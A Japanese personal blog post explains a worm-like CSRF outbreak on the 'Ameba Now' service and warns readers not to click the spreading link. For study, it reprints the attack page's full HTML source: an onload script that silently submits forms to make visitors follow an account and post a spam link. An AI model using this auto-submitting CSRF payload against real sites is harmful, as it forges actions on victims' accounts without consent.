新・元地方の中規模印刷会社で苦悩するWebデザイナー改めWebディレクターの日記

自由な20代、窮屈な30代を経て、遂に40代になっちまったWebディレクター&パソコン講師の覚書と思う言(こと)。略称【ちほちゅう】

*

「Ameba(アメーバ)なう」でこんにちは!祭

   

  • このエントリーをはてなブックマークに追加

1年以上前の記事です。内容が古い可能性があります。

先日、パソコン版が使えるようになったばかりの「Amebaなう」でこんにちは!!ワーム(のようなもの)が発生しているそうだ。

【緊急】アメーバなう利用中の皆さんへ【ご注意!】|ぼくはまちちゃん!(アメーバ)

お友達の書き込みに「こんにちはこんにちは!!」というものがあったら 絶対にクリックしないでください!!!!

アメーバにアクセスしている状態でこちらのリンクを踏むと感染?する。
アメーバなうでこんにちは! (←今は動かないようですが念のため踏まないでください)

ネットワーク 現場の教科書 増補改訂版 (IDGムックシリーズ)ネットワーク 現場の教科書 増補改訂版 (IDGムックシリーズ)
販売元:アイ・ディ・ジー・ジャパン
発売日:2008-07-16
レビューを見る

スポンサーリンク
 

クロスサイトスクリプティングに似たクロスサイトリクエストフォージェリ(CSRF)といった技術を使ったワームのようなものらしい。
@IT:「ぼくはまちちゃん」 ――知られざるCSRF攻撃

ちなみにソースはHTMLとJavascriptだけという簡単なもの。
勉強になるので公開しちゃう。いいですよね、製作者さん。

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>アメーバなうでこんにちは!</title>
</head>
<body onload="document.getElementById('f1').submit();document.getElementById('f2').submit()">
<form action="http://now.ameba.jp/api/follow" method="post" id="f1" target="ifr1">
<input type="text" name="followAmebaId" value="主のID">
</form>
<form action="http://ucsnow.ameba.jp/post" method="post" id="f2" target="ifr2">
<input type="text" name="entryText" value="こんにちはこんにちは!! http://bit.ly/7RIjd8">
<input type="text" name="replyEntryId" value="0000">
</form>
<iframe name="ifr1"></iframe>
<iframe name="ifr2"></iframe>
</body>
</html>

このページを開くとonloadで書かれたスクリプトが実行される。
スクリプトにはフォームのサブミット(送信)ボタンを押せと書かれている。
で、そのフォームが「Amebaなう」に上記サイトのリンクを入れた定型文を書き込むフォームと、主さん?をフォローするフォームになっている。
ちなみにiframeはその結果を表示させるためにある。
(followAmebaIdとreplyEntryIdは書き換えました)

まあ、単純に「Amebaなう」内だけではなく、外部からも書き込みやフォローができるようになっていたということだと思う。

とりあえず現在は閉めちゃったみたいで動いていないみたい。
主さんのAmebaなうアカウントも消されちゃったみたいですし。。

一部ではAmebaのマーケティング手法の一つだろうと言っている人もいますが果たして。。

Amebaなう(アメーバなう)
のりささんの投稿したなう | Amebaなう(アメーバなう)

※ この記事は前日の深夜書いたものでして、現在上記「アメーバなうでこんにちは!」のサイトは全く危険性の無いサイトに入れ替わっています。(公開時追記)
※ ブコメで指摘受けたのでワーム(のようなもの)に表記を変えました。
ちなみにワームとは (さらに追記)

 - セキュリティ, 雑談

アドセンス広告メイン

Message

メールアドレスが公開されることはありません。

  関連記事

Apple(アップル)、「App Store」で配布された「XcodeGhost」感染アプリ25本を公表

1年以上前の記事です。内容が古い可能性があります。こちらの続報です。 もともとは …

いやしの一枚

1年以上前の記事です。内容が古い可能性があります。ぺろみさ

悪いリリー・フランキー映画「凶悪」はノンフィクションの原作に老人問題がプラスされたフィクション

1年以上前の記事です。内容が古い可能性があります。良いリリー・フランキー「そして …

【映画評】 巨匠黒澤明の「七人の侍」を見た

1年以上前の記事です。内容が古い可能性があります。いろいろ忙しい年末のさなかに二 …

ラブライブ声優「新田恵海」AV出演の影で霞む「広瀬すず」17歳壮絶レイプって何?

1年以上前の記事です。内容が古い可能性があります。以下、アサヒ芸能さんの目次(中 …

選挙行ってきた【衆院選2009】 #tohyo #senkyo (9/1追記)

1年以上前の記事です。内容が古い可能性があります。投票所入場券が見つからないなん …

カフェスタ終了へ 【今週のトピック】

1年以上前の記事です。内容が古い可能性があります。5月3日~5月9日のトピックで …

Amazon(アマゾン)の注文履歴は削除できない

1年以上前の記事です。内容が古い可能性があります。Amazon(アマゾン)で人に …

日教組のサイトが「Google Chrome」から排除されている

1年以上前の記事です。内容が古い可能性があります。なんとなーく自分の過去記事から …

映画「40歳問題」を40歳半ばが見た感想@PipiiStream(ピピィストリーム)

1年以上前の記事です。内容が古い可能性があります。この映画は「40歳」という老害 …

血液型オヤジ